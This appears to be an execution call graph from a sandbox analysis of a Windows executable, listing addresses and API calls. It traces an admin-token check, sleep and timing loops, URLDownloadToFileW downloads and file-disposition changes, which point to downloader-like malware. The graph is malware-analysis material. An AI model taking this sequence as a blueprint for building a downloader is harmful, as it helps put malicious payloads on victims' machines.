                          execution_graph 18048 7ff646e674cc 18053 7ff646e69544 18048->18053 18050 7ff646e674d5 18052 7ff646e674f2 __vcrt_uninitialize_ptd 18050->18052 18057 7ff646e673e0 18050->18057 18054 7ff646e69559 18053->18054 18055 7ff646e69555 18053->18055 18054->18055 18066 7ff646e68d24 18054->18066 18055->18050 18058 7ff646e67429 GetLastError 18057->18058 18059 7ff646e673ff _set_fmode 18057->18059 18063 7ff646e6743c 18058->18063 18061 7ff646e67424 18059->18061 18076 7ff646e67260 GetLastError 18059->18076 18060 7ff646e6745a SetLastError 18060->18061 18061->18052 18062 7ff646e67457 18062->18060 18063->18060 18063->18062 18064 7ff646e67260 _set_fmode 11 API calls 18063->18064 18064->18062 18067 7ff646e68e14 18066->18067 18075 7ff646e62d84 EnterCriticalSection 18067->18075 18069 7ff646e68e22 VirtualProtect 18070 7ff646e68ed0 18069->18070 18071 7ff646e62b78 BuildCatchObjectHelperInternal 36 API calls 18070->18071 18073 7ff646e68ed5 18071->18073 18072 7ff646e68f15 18072->18055 18073->18072 18074 7ff646e68d24 __crtLCMapStringW 36 API calls 18073->18074 18074->18072 18077 7ff646e67286 18076->18077 18078 7ff646e6728c SetLastError 18077->18078 18094 7ff646e677c0 18077->18094 18079 7ff646e67305 18078->18079 18079->18061 18082 7ff646e672c5 FlsSetValue 18085 7ff646e672e8 18082->18085 18086 7ff646e672d1 FlsSetValue 18082->18086 18083 7ff646e672b5 FlsSetValue 18101 7ff646e68670 18083->18101 18107 7ff646e67078 18085->18107 18088 7ff646e68670 __free_lconv_mon 7 API calls 18086->18088 18090 7ff646e672e6 SetLastError 18088->18090 18090->18079 18099 7ff646e677d1 std::_Locinfo::_Locinfo_ctor 18094->18099 18095 7ff646e67822 18115 7ff646e62d18 18095->18115 18096 7ff646e67806 RtlAllocateHeap 18097 7ff646e672a7 18096->18097 18096->18099 18097->18082 18097->18083 18099->18095 18099->18096 18112 7ff646e63770 18099->18112 18102 7ff646e68675 HeapFree 18101->18102 18106 7ff646e672c3 18101->18106 18103 7ff646e68690 GetLastError 18102->18103 18102->18106 18104 7ff646e6869d __free_lconv_mon 18103->18104 18105 7ff646e62d18 _set_fmode 11 API calls 18104->18105 18105->18106 18106->18078 18124 7ff646e66f50 18107->18124 18118 7ff646e637c0 18112->18118 18116 7ff646e673e0 _set_fmode 13 API calls 18115->18116 18117 7ff646e62d21 18116->18117 18117->18097 18123 7ff646e62d84 EnterCriticalSection 18118->18123 18136 7ff646e62d84 EnterCriticalSection 18124->18136 18138 7ff646e6773c 18149 7ff646e62d84 EnterCriticalSection 18138->18149 18140 7ff646e6774c 18141 7ff646e6e56c 36 API calls 18140->18141 18142 7ff646e67755 18141->18142 18143 7ff646e67763 18142->18143 18144 7ff646e67534 38 API calls 18142->18144 18145 7ff646e62dd8 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 18143->18145 18146 7ff646e6775e 18144->18146 18147 7ff646e6776f 18145->18147 18148 7ff646e67634 GetStdHandle GetFileType 18146->18148 18148->18143 18150 7ff646e641b6 18162 7ff646e663e0 18150->18162 18152 7ff646e641bb 18153 7ff646e6422b 18152->18153 18154 7ff646e641e1 GetModuleHandleW 18152->18154 18155 7ff646e640c4 13 API calls 18153->18155 18154->18153 18157 7ff646e641ee 18154->18157 18158 7ff646e64267 18155->18158 18156 7ff646e6428c 18157->18153 18159 7ff646e642d0 GetModuleHandleExW GetProcAddress FreeLibrary 18157->18159 18158->18156 18160 7ff646e642a0 6 API calls 18158->18160 18159->18153 18161 7ff646e6429e 18160->18161 18167 7ff646e67380 18162->18167 18164 7ff646e663e9 18173 7ff646e62b78 18164->18173 18168 7ff646e673e0 _set_fmode 13 API calls 18167->18168 18169 7ff646e67389 18168->18169 18170 7ff646e6738e 18169->18170 18171 7ff646e62b78 BuildCatchObjectHelperInternal 36 API calls 18169->18171 18170->18164 18172 7ff646e67398 18171->18172 18182 7ff646e6b568 18173->18182 18216 7ff646e6b520 18182->18216 18221 7ff646e62d84 EnterCriticalSection 18216->18221 18274 7ff646e69514 VirtualProtect 18275 7ff646e5ac44 18296 7ff646e5b150 18275->18296 18278 7ff646e5ad90 18342 7ff646e5b800 IsProcessorFeaturePresent 18278->18342 18279 7ff646e5ac60 __scrt_acquire_startup_lock 18281 7ff646e5ad9a 18279->18281 18288 7ff646e5ac7e __scrt_release_startup_lock 18279->18288 18282 7ff646e5b800 7 API calls 18281->18282 18283 7ff646e5ada5 BuildCatchObjectHelperInternal 18282->18283 18284 7ff646e5aca3 18285 7ff646e5ad29 18302 7ff646e5b948 18285->18302 18287 7ff646e5ad2e 18305 7ff646e57820 18287->18305 18288->18284 18288->18285 18331 7ff646e64368 18288->18331 18293 7ff646e5ad51 18293->18283 18338 7ff646e5b2d4 18293->18338 18297 7ff646e5b158 18296->18297 18298 7ff646e5b164 __scrt_dllmain_crt_thread_attach 18297->18298 18299 7ff646e5ac58 18298->18299 18300 7ff646e5b171 18298->18300 18299->18278 18299->18279 18300->18299 18349 7ff646e5ccf0 18300->18349 18376 7ff646e73b50 18302->18376 18378 7ff646e582d0 18305->18378 18308 7ff646e578a6 CheckTokenMembership 18311 7ff646e578ba 18308->18311 18309 7ff646e578d8 18447 7ff646e56d80 18309->18447 18313 7ff646e578cc 18311->18313 18314 7ff646e578c6 FreeSid 18311->18314 18312 7ff646e578d6 __scrt_get_show_window_mode 18317 7ff646e578ee GetModuleFileNameW 18312->18317 18313->18309 18315 7ff646e578d1 18313->18315 18314->18313 18387 7ff646e566b0 18315->18387 18421 7ff646e4bf70 18317->18421 18319 7ff646e57921 18435 7ff646e4d2d0 18319->18435 18321 7ff646e57a2e ctype 18323 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 18321->18323 18322 7ff646e5799e ctype 18322->18321 18324 7ff646e57a55 18322->18324 18325 7ff646e57a44 18323->18325 18516 7ff646e62428 18324->18516 18336 7ff646e5b98c GetModuleHandleW 18325->18336 18332 7ff646e6437f 18331->18332 18333 7ff646e6439e 18331->18333 18332->18285 18334 7ff646e663e0 __GSHandlerCheck_EH 36 API calls 18333->18334 18335 7ff646e643a3 18334->18335 18337 7ff646e5b99d 18336->18337 18337->18293 18339 7ff646e5b2e5 18338->18339 18340 7ff646e5ad68 18339->18340 18341 7ff646e5ccf0 7 API calls 18339->18341 18340->18284 18341->18340 18343 7ff646e5b826 __scrt_get_show_window_mode BuildCatchObjectHelperInternal 18342->18343 18344 7ff646e5b845 RtlCaptureContext RtlLookupFunctionEntry 18343->18344 18345 7ff646e5b8aa __scrt_get_show_window_mode 18344->18345 18346 7ff646e5b86e RtlVirtualUnwind 18344->18346 18347 7ff646e5b8dc IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18345->18347 18346->18345 18348 7ff646e5b92a BuildCatchObjectHelperInternal 18347->18348 18348->18281 18350 7ff646e5ccf8 18349->18350 18351 7ff646e5cd02 18349->18351 18355 7ff646e5cec8 18350->18355 18351->18299 18356 7ff646e5ced7 18355->18356 18357 7ff646e5ccfd 18355->18357 18363 7ff646e602e4 18356->18363 18359 7ff646e60114 18357->18359 18360 7ff646e6013f 18359->18360 18361 7ff646e60143 18360->18361 18362 7ff646e60122 DeleteCriticalSection 18360->18362 18361->18351 18362->18360 18367 7ff646e6014c 18363->18367 18368 7ff646e60190 __vcrt_InitializeCriticalSectionEx 18367->18368 18373 7ff646e60236 TlsFree 18367->18373 18369 7ff646e601be LoadLibraryExW 18368->18369 18370 7ff646e6027d GetProcAddress 18368->18370 18368->18373 18375 7ff646e60201 LoadLibraryExW 18368->18375 18371 7ff646e6025d 18369->18371 18372 7ff646e601df GetLastError 18369->18372 18370->18373 18371->18370 18374 7ff646e60274 FreeLibrary 18371->18374 18372->18368 18374->18370 18375->18368 18375->18371 18377 7ff646e5b95f GetStartupInfoW 18376->18377 18377->18287 18521 7ff646e56270 18378->18521 18380 7ff646e56270 2 API calls 18383 7ff646e582f1 18380->18383 18381 7ff646e57857 AllocateAndInitializeSid 18381->18308 18381->18309 18382 7ff646e5837b Sleep 18382->18383 18383->18380 18383->18381 18383->18382 18384 7ff646e5839a Sleep 18383->18384 18385 7ff646e583a8 Sleep SleepEx 18383->18385 18384->18383 18385->18381 18388 7ff646e73b50 __scrt_get_show_window_mode 18387->18388 18389 7ff646e566f3 GetCurrentDirectoryW 18388->18389 18390 7ff646e56720 18389->18390 18390->18390 18391 7ff646e4bf70 37 API calls 18390->18391 18392 7ff646e56737 18391->18392 18393 7ff646e4d2d0 37 API calls 18392->18393 18394 7ff646e567be 18393->18394 18395 7ff646e4d2d0 37 API calls 18394->18395 18396 7ff646e5683c ctype 18395->18396 18396->18396 18420 7ff646e56d5d 18396->18420 18530 7ff646e4c1f0 18396->18530 18398 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18400 7ff646e56d63 18398->18400 18399 7ff646e56ae6 18544 7ff646e563c0 18399->18544 18402 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18400->18402 18404 7ff646e56d69 18402->18404 18406 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18404->18406 18408 7ff646e56d6f 18406->18408 18407 7ff646e56b33 ctype 18407->18400 18407->18404 18409 7ff646e4d2d0 37 API calls 18407->18409 18410 7ff646e56c3e ctype 18407->18410 18411 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18408->18411 18409->18410 18410->18408 18413 7ff646e56d75 18410->18413 18414 7ff646e56d58 18410->18414 18415 7ff646e56d28 ctype 18410->18415 18411->18413 18412 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 18416 7ff646e56d3f 18412->18416 18417 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18413->18417 18418 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18414->18418 18415->18412 18416->18312 18419 7ff646e56d7b 18417->18419 18418->18420 18420->18398 18422 7ff646e4c096 18421->18422 18425 7ff646e4bf96 18421->18425 18423 7ff646e41210 37 API calls 18422->18423 18424 7ff646e4c09c 18423->18424 18426 7ff646e4bffa 18425->18426 18427 7ff646e4c04e 18425->18427 18432 7ff646e4bfa1 BuildCatchObjectHelperInternal 18425->18432 18434 7ff646e4c090 18425->18434 18430 7ff646e5aae8 std::_Facet_Register 37 API calls 18426->18430 18426->18434 18429 7ff646e5aae8 std::_Facet_Register 37 API calls 18427->18429 18428 7ff646e41170 Concurrency::cancel_current_task 37 API calls 18428->18422 18429->18432 18431 7ff646e4c00f 18430->18431 18431->18432 18433 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18431->18433 18432->18319 18433->18434 18434->18428 18438 7ff646e4d33e 18435->18438 18436 7ff646e4d3a5 __scrt_get_show_window_mode 18615 7ff646e4f160 18436->18615 18438->18436 18630 7ff646e4b940 18438->18630 18442 7ff646e4d456 18443 7ff646e4d49c 18442->18443 18445 7ff646e4f2d0 37 API calls 18442->18445 18444 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 18443->18444 18446 7ff646e4d4af 18444->18446 18445->18443 18446->18322 18448 7ff646e73b50 __scrt_get_show_window_mode 18447->18448 18449 7ff646e56dbb GetCurrentDirectoryW 18448->18449 18450 7ff646e56df1 18449->18450 18450->18450 18451 7ff646e4bf70 37 API calls 18450->18451 18452 7ff646e56e0d 18451->18452 18453 7ff646e4d2d0 37 API calls 18452->18453 18454 7ff646e56ea5 18453->18454 18455 7ff646e56ee3 ctype 18454->18455 18456 7ff646e576eb 18454->18456 18458 7ff646e4c1f0 37 API calls 18455->18458 18457 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18456->18457 18459 7ff646e576f0 18457->18459 18460 7ff646e57139 18458->18460 18462 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18459->18462 18461 7ff646e563c0 39 API calls 18460->18461 18463 7ff646e5714c URLDownloadToFileW 18461->18463 18464 7ff646e576f6 18462->18464 18466 7ff646e571c8 ctype 18463->18466 18467 7ff646e57196 18463->18467 18468 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18464->18468 18466->18464 18469 7ff646e5721e ctype __scrt_get_show_window_mode 18466->18469 18467->18459 18467->18466 18473 7ff646e576fc 18468->18473 18514 7ff646e572e4 18469->18514 18717 7ff646e57ff0 18469->18717 18470 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 18475 7ff646e576d6 18470->18475 18472 7ff646e57771 18474 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18472->18474 18869 7ff646e420e0 18473->18869 18477 7ff646e57777 18474->18477 18475->18312 18476 7ff646e57267 18478 7ff646e572aa 18476->18478 18479 7ff646e57337 18476->18479 18734 7ff646e48780 18478->18734 18738 7ff646e57ac0 18479->18738 18484 7ff646e57742 18487 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 18484->18487 18485 7ff646e5735c 18488 7ff646e48780 70 API calls 18485->18488 18486 7ff646e57433 18742 7ff646e57ba0 18486->18742 18489 7ff646e57756 18487->18489 18488->18514 18880 7ff646e56350 18489->18880 18494 7ff646e57464 18770 7ff646e57d90 18494->18770 18495 7ff646e57765 18498 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18495->18498 18497 7ff646e5747c 18779 7ff646e49360 18497->18779 18500 7ff646e5776b 18498->18500 18503 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18500->18503 18502 7ff646e574d0 18504 7ff646e4bf70 37 API calls 18502->18504 18503->18472 18505 7ff646e5750e 18504->18505 18785 7ff646e5928c 18505->18785 18508 7ff646e57534 18508->18495 18509 7ff646e57571 ctype 18508->18509 18817 7ff646e45eb0 18509->18817 18514->18472 18515 7ff646e57427 ctype 18514->18515 18515->18470 18517 7ff646e622b4 _invalid_parameter_noinfo 35 API calls 18516->18517 18518 7ff646e62441 18517->18518 18519 7ff646e62458 _invalid_parameter_noinfo_noreturn 17 API calls 18518->18519 18520 7ff646e62456 18519->18520 18526 7ff646e5a6b0 18521->18526 18525 7ff646e5628a 18525->18383 18527 7ff646e56282 18526->18527 18528 7ff646e5a6c0 QueryPerformanceFrequency 18526->18528 18529 7ff646e5a694 QueryPerformanceCounter 18527->18529 18528->18527 18529->18525 18535 7ff646e4c216 18530->18535 18543 7ff646e4c2e4 18530->18543 18531 7ff646e4c21c BuildCatchObjectHelperInternal 18531->18399 18533 7ff646e4c24c 18540 7ff646e4c2de 18533->18540 18553 7ff646e5aae8 18533->18553 18535->18531 18535->18533 18537 7ff646e4c2a5 18535->18537 18538 7ff646e5aae8 std::_Facet_Register 37 API calls 18537->18538 18538->18531 18562 7ff646e41170 18540->18562 18542 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18542->18540 18568 7ff646e41210 18543->18568 18545 7ff646e563ed 18544->18545 18546 7ff646e56407 MultiByteToWideChar 18544->18546 18548 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 18545->18548 18601 7ff646e583f0 18546->18601 18550 7ff646e564b6 URLDownloadToFileW 18548->18550 18550->18407 18555 7ff646e5aaf3 18553->18555 18554 7ff646e4c262 18554->18531 18554->18542 18555->18554 18556 7ff646e63770 std::_Facet_Register 2 API calls 18555->18556 18557 7ff646e5ab12 18555->18557 18556->18555 18558 7ff646e5ab1d 18557->18558 18571 7ff646e59bcc 18557->18571 18560 7ff646e41170 Concurrency::cancel_current_task 37 API calls 18558->18560 18561 7ff646e5ab23 18560->18561 18563 7ff646e4117e Concurrency::cancel_current_task 18562->18563 18564 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 18563->18564 18565 7ff646e4118f 18564->18565 18580 7ff646e5c798 18565->18580 18567 7ff646e411b9 18567->18543 18593 7ff646e59bec 18568->18593 18572 7ff646e59bda std::bad_alloc::bad_alloc 18571->18572 18575 7ff646e5c9e0 18572->18575 18574 7ff646e59beb 18576 7ff646e5c9ff 18575->18576 18577 7ff646e5ca4a RaiseException 18576->18577 18578 7ff646e5ca28 RtlPcToFileHeader 18576->18578 18577->18574 18579 7ff646e5ca40 18578->18579 18579->18577 18581 7ff646e5c7b9 18580->18581 18582 7ff646e5c7ee 18580->18582 18581->18582 18584 7ff646e66400 18581->18584 18582->18567 18585 7ff646e6640d 18584->18585 18586 7ff646e66417 18584->18586 18585->18586 18591 7ff646e66432 18585->18591 18587 7ff646e62d18 _set_fmode 13 API calls 18586->18587 18588 7ff646e6641e 18587->18588 18590 7ff646e62408 _invalid_parameter_noinfo 35 API calls 18588->18590 18589 7ff646e6642a 18589->18582 18590->18589 18591->18589 18592 7ff646e62d18 _set_fmode 13 API calls 18591->18592 18592->18588 18598 7ff646e59ac4 18593->18598 18596 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 18597 7ff646e59c0e 18596->18597 18599 7ff646e5c798 __std_exception_copy 35 API calls 18598->18599 18600 7ff646e59af8 18599->18600 18600->18596 18602 7ff646e58515 18601->18602 18605 7ff646e5841a 18601->18605 18603 7ff646e41210 37 API calls 18602->18603 18604 7ff646e5851b 18603->18604 18606 7ff646e5850f 18605->18606 18607 7ff646e584d8 18605->18607 18608 7ff646e58481 18605->18608 18611 7ff646e56455 MultiByteToWideChar 18605->18611 18609 7ff646e41170 Concurrency::cancel_current_task 37 API calls 18606->18609 18610 7ff646e5aae8 std::_Facet_Register 37 API calls 18607->18610 18608->18606 18612 7ff646e5aae8 std::_Facet_Register 37 API calls 18608->18612 18609->18602 18610->18611 18611->18545 18613 7ff646e58496 18612->18613 18613->18611 18614 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18613->18614 18614->18606 18616 7ff646e4d41a 18615->18616 18620 7ff646e4f181 18615->18620 18622 7ff646e4f2d0 18616->18622 18618 7ff646e4f2c2 18674 7ff646e439b0 18618->18674 18620->18616 18620->18618 18644 7ff646e4f410 18620->18644 18623 7ff646e4f2fd 18622->18623 18624 7ff646e4f406 18623->18624 18625 7ff646e4f319 18623->18625 18706 7ff646e49a80 18624->18706 18629 7ff646e4f328 BuildCatchObjectHelperInternal 18625->18629 18692 7ff646e4d4d0 18625->18692 18629->18442 18631 7ff646e4ba9e 18630->18631 18635 7ff646e4b969 18630->18635 18632 7ff646e41210 37 API calls 18631->18632 18633 7ff646e4baa4 18632->18633 18634 7ff646e4ba98 18639 7ff646e41170 Concurrency::cancel_current_task 37 API calls 18634->18639 18635->18634 18636 7ff646e4b9e2 18635->18636 18637 7ff646e4ba0e 18635->18637 18642 7ff646e4b9c7 BuildCatchObjectHelperInternal 18635->18642 18636->18634 18640 7ff646e5aae8 std::_Facet_Register 37 API calls 18636->18640 18638 7ff646e5aae8 std::_Facet_Register 37 API calls 18637->18638 18638->18642 18639->18631 18640->18642 18641 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18641->18634 18642->18641 18643 7ff646e4ba60 ctype BuildCatchObjectHelperInternal 18642->18643 18643->18436 18645 7ff646e4f444 18644->18645 18670 7ff646e4f716 18644->18670 18646 7ff646e4f44d 18645->18646 18653 7ff646e4f472 18645->18653 18648 7ff646e4f45a 18646->18648 18649 7ff646e4f73d 18646->18649 18647 7ff646e439b0 std::_Xinvalid_argument 37 API calls 18650 7ff646e4f723 18647->18650 18679 7ff646e4fba0 18648->18679 18652 7ff646e439b0 std::_Xinvalid_argument 37 API calls 18649->18652 18654 7ff646e439b0 std::_Xinvalid_argument 37 API calls 18650->18654 18656 7ff646e4f74a 18652->18656 18653->18649 18653->18650 18655 7ff646e4f46d 18653->18655 18657 7ff646e4f730 18653->18657 18659 7ff646e4f5bc 18653->18659 18660 7ff646e4f5ac 18653->18660 18653->18670 18654->18657 18658 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 18655->18658 18662 7ff646e439b0 std::_Xinvalid_argument 37 API calls 18656->18662 18664 7ff646e439b0 std::_Xinvalid_argument 37 API calls 18657->18664 18661 7ff646e4f6ef 18658->18661 18665 7ff646e4f6fd 18659->18665 18671 7ff646e4f5c6 18659->18671 18663 7ff646e4fba0 8 API calls 18660->18663 18661->18620 18666 7ff646e4f757 18662->18666 18663->18655 18664->18649 18667 7ff646e439b0 std::_Xinvalid_argument 37 API calls 18665->18667 18668 7ff646e4f709 18667->18668 18669 7ff646e439b0 std::_Xinvalid_argument 37 API calls 18668->18669 18669->18670 18670->18647 18671->18656 18672 7ff646e4f609 18671->18672 18683 7ff646e4f760 18671->18683 18672->18655 18672->18668 18687 7ff646e439e0 18674->18687 18677 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 18678 7ff646e439d2 18677->18678 18680 7ff646e4fbe9 18679->18680 18681 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 18680->18681 18682 7ff646e4fc6a 18681->18682 18682->18655 18684 7ff646e4f78f 18683->18684 18685 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18684->18685 18686 7ff646e4fb63 18685->18686 18688 7ff646e5c798 __std_exception_copy 35 API calls 18687->18688 18689 7ff646e43a23 18688->18689 18690 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 18689->18690 18691 7ff646e439c1 18690->18691 18691->18677 18693 7ff646e4d6c1 18692->18693 18696 7ff646e4d50d 18692->18696 18694 7ff646e41210 37 API calls 18693->18694 18695 7ff646e4d6c7 18694->18695 18697 7ff646e4d6bb 18696->18697 18698 7ff646e4d58b 18696->18698 18699 7ff646e4d5b7 18696->18699 18704 7ff646e4d570 BuildCatchObjectHelperInternal 18696->18704 18700 7ff646e41170 Concurrency::cancel_current_task 37 API calls 18697->18700 18698->18697 18702 7ff646e5aae8 std::_Facet_Register 37 API calls 18698->18702 18701 7ff646e5aae8 std::_Facet_Register 37 API calls 18699->18701 18700->18693 18701->18704 18702->18704 18703 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18703->18697 18704->18703 18705 7ff646e4d652 ctype BuildCatchObjectHelperInternal 18704->18705 18705->18629 18709 7ff646e59c10 18706->18709 18714 7ff646e59b84 18709->18714 18712 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 18713 7ff646e59c32 18712->18713 18715 7ff646e5c798 __std_exception_copy 35 API calls 18714->18715 18716 7ff646e59bb8 18715->18716 18716->18712 18888 7ff646e49aa0 18717->18888 18724 7ff646e58187 18728 7ff646e420e0 72 API calls 18724->18728 18733 7ff646e5813d 18724->18733 18725 7ff646e5810d 18913 7ff646e49260 18725->18913 18729 7ff646e581f1 18728->18729 18731 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 18729->18731 18732 7ff646e58202 18731->18732 18733->18476 18735 7ff646e4879d 18734->18735 18736 7ff646e49360 70 API calls 18735->18736 18737 7ff646e487da 18735->18737 18736->18737 18737->18514 18739 7ff646e57af0 18738->18739 19385 7ff646e58210 18739->19385 18741 7ff646e5734c 18741->18485 18741->18486 18743 7ff646e57bfc 18742->18743 18745 7ff646e57cdd 18742->18745 18744 7ff646e58210 81 API calls 18743->18744 18750 7ff646e57c21 18744->18750 18746 7ff646e420e0 72 API calls 18745->18746 18748 7ff646e57d1f 18746->18748 18747 7ff646e57440 18755 7ff646e58520 18747->18755 18749 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 18748->18749 18749->18750 18750->18747 18751 7ff646e420e0 72 API calls 18750->18751 18752 7ff646e57d78 18751->18752 18753 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 18752->18753 18754 7ff646e57d8c 18753->18754 18756 7ff646e58542 18755->18756 18757 7ff646e58650 18755->18757 18759 7ff646e58570 18756->18759 18762 7ff646e585b3 18756->18762 18763 7ff646e585c2 18756->18763 18767 7ff646e5857f __scrt_get_show_window_mode BuildCatchObjectHelperInternal 18756->18767 19435 7ff646e58670 18757->19435 18761 7ff646e5aae8 std::_Facet_Register 37 API calls 18759->18761 18760 7ff646e58655 18765 7ff646e41170 Concurrency::cancel_current_task 37 API calls 18760->18765 18761->18767 18762->18759 18762->18760 18764 7ff646e5aae8 std::_Facet_Register 37 API calls 18763->18764 18764->18767 18765->18767 18766 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18768 7ff646e58661 18766->18768 18767->18766 18769 7ff646e5861d ctype 18767->18769 18769->18494 18771 7ff646e57dd6 18770->18771 18772 7ff646e58210 81 API calls 18771->18772 18774 7ff646e57de5 18772->18774 18773 7ff646e57e5a 18773->18497 18774->18773 18775 7ff646e420e0 72 API calls 18774->18775 18776 7ff646e57ecb 18775->18776 18777 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 18776->18777 18778 7ff646e57edc 18777->18778 18778->18497 18780 7ff646e4937a 18779->18780 18784 7ff646e493ca 18779->18784 19438 7ff646e49170 18780->19438 18782 7ff646e493b4 18783 7ff646e60cf0 65 API calls 18782->18783 18783->18784 18784->18473 18784->18502 19467 7ff646e59178 CreateFileW 18785->19467 18788 7ff646e592d7 18789 7ff646e592da SetFileInformationByHandle 18788->18789 18796 7ff646e59300 18788->18796 18790 7ff646e5937c GetLastError 18789->18790 18789->18796 18792 7ff646e59389 18790->18792 18791 7ff646e59178 __std_fs_open_handle 2 API calls 18791->18788 18792->18796 19470 7ff646e587e8 SetFileInformationByHandle 18792->19470 18794 7ff646e59356 18799 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 18794->18799 18795 7ff646e5947f 18801 7ff646e62b78 BuildCatchObjectHelperInternal 36 API calls 18795->18801 18796->18794 18798 7ff646e59348 CloseHandle 18796->18798 18798->18794 18798->18795 18800 7ff646e57525 18799->18800 18800->18489 18800->18508 18802 7ff646e594a6 18801->18802 18804 7ff646e62b78 BuildCatchObjectHelperInternal 36 API calls 18802->18804 18803 7ff646e593b9 GetFileInformationByHandleEx 18805 7ff646e593d2 18803->18805 18806 7ff646e593ff 18803->18806 18808 7ff646e594ac 18804->18808 18809 7ff646e593d6 GetLastError 18805->18809 18807 7ff646e59406 SetFileInformationByHandle 18806->18807 18814 7ff646e593df 18806->18814 18807->18805 18810 7ff646e59422 18807->18810 18809->18814 18811 7ff646e587e8 4 API calls 18810->18811 18813 7ff646e5942a 18811->18813 18812 7ff646e593e9 CloseHandle 18812->18794 18812->18802 18813->18814 18815 7ff646e5946a GetLastError 18813->18815 18816 7ff646e5943c SetFileInformationByHandle 18813->18816 18814->18794 18814->18812 18815->18796 18816->18809 18816->18814 18818 7ff646e73b50 __scrt_get_show_window_mode 18817->18818 18819 7ff646e45f07 GetSystemDirectoryW 18818->18819 18820 7ff646e45f5d 18819->18820 18821 7ff646e4bf70 37 API calls 18820->18821 18822 7ff646e45f62 18821->18822 18823 7ff646e4d2d0 37 API calls 18822->18823 18824 7ff646e4600c 18823->18824 18825 7ff646e4d2d0 37 API calls 18824->18825 18826 7ff646e460ae 18825->18826 18827 7ff646e4d2d0 37 API calls 18826->18827 18828 7ff646e46150 18827->18828 18829 7ff646e4d2d0 37 API calls 18828->18829 18830 7ff646e461f2 18829->18830 18831 7ff646e4bf70 37 API calls 18830->18831 18832 7ff646e4624d 18831->18832 19476 7ff646e453e0 18832->19476 18834 7ff646e469c6 19496 7ff646e44940 18834->19496 18838 7ff646e4d2d0 37 API calls 18840 7ff646e466c8 18838->18840 19482 7ff646e479f0 18840->19482 18844 7ff646e466d9 18848 7ff646e4bf70 37 API calls 18844->18848 18850 7ff646e46982 18848->18850 18851 7ff646e4bf70 37 API calls 18850->18851 18851->18834 18870 7ff646e42110 18869->18870 18870->18870 18871 7ff646e4c1f0 37 API calls 18870->18871 18872 7ff646e42124 18871->18872 18873 7ff646e414f0 72 API calls 18872->18873 18874 7ff646e4213d 18873->18874 18875 7ff646e42172 ctype 18874->18875 18876 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 18874->18876 18875->18484 18877 7ff646e42194 18876->18877 18878 7ff646e5c798 __std_exception_copy 35 API calls 18877->18878 18879 7ff646e421cd 18878->18879 18879->18484 18881 7ff646e56366 18880->18881 18882 7ff646e48cc0 37 API calls 18881->18882 18883 7ff646e5637f 18882->18883 18884 7ff646e441d0 78 API calls 18883->18884 18885 7ff646e563a1 18884->18885 18886 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 18885->18886 18887 7ff646e563b2 18886->18887 18889 7ff646e5aae8 std::_Facet_Register 37 API calls 18888->18889 18890 7ff646e49aef 18889->18890 18938 7ff646e59dfc 18890->18938 18894 7ff646e49b79 18900 7ff646e49760 18894->18900 18895 7ff646e49b29 18895->18894 18896 7ff646e420e0 72 API calls 18895->18896 18897 7ff646e49bd1 18896->18897 18898 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 18897->18898 18899 7ff646e49be2 18898->18899 18901 7ff646e5aae8 std::_Facet_Register 37 API calls 18900->18901 18902 7ff646e497dc 18901->18902 18903 7ff646e59dfc 43 API calls 18902->18903 18904 7ff646e497ec 18903->18904 18904->18724 18905 7ff646e5a20c 18904->18905 18908 7ff646e5a252 18905->18908 18909 7ff646e58108 18908->18909 19090 7ff646e63218 18908->19090 18909->18724 18909->18725 18911 7ff646e5a2a0 18911->18909 19113 7ff646e60cf0 18911->19113 18914 7ff646e492da 18913->18914 18917 7ff646e492fa 18913->18917 19359 7ff646e61070 18914->19359 18916 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 18918 7ff646e49344 18916->18918 18917->18916 18919 7ff646e4b800 18918->18919 18920 7ff646e599bc std::_Lockit::_Lockit 39 API calls 18919->18920 18921 7ff646e4b830 18920->18921 18922 7ff646e599bc std::_Lockit::_Lockit 39 API calls 18921->18922 18927 7ff646e4b87f 18921->18927 18924 7ff646e4b855 18922->18924 18923 7ff646e4b8cc 18925 7ff646e59a34 std::_Lockit::~_Lockit LeaveCriticalSection 18923->18925 18928 7ff646e59a34 